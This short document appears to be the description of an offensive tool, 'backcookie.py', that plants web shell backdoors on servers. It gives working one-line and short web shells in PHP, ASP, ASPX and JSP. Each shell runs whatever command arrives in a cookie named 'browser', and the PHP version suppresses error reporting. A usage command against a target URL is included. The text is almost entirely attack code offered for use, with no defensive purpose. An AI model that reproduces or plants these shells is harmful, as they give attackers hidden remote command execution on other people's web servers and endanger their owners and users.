It is a tool that allows you to leave a backdoor on a given file on a web server in PHP,ASP,ASPX,JSP, through the connection between the server and the cookie (which works as an access key).
Put this script in a PHP file on the web server.
<?php error_reporting(0); system($_COOKIE["browser"]); ?>We must specify the url with the file, and then the cookie.
python3 backcookie.py -d 'http://192.168.219.130/sistema/test.php' -c browser
<%
On Error Resume Next
dim cmd : cmd = Request.Cookies("browser")
ExecuteGlobal(cmd)
%> <%@ Page Language="C#" %>
<%
try
{
string cmd = Request.Cookies["browser"].Value;
System.Diagnostics.Process.Start("cmd.exe", "/c " + cmd);
}
catch (Exception ex)
{
// handle error
}
%> <%
String cmd = request.getCookies()["browser"].getValue();
try
{
Runtime.getRuntime().exec(cmd);
}
catch (Exception e)
{
// handle error
}
%>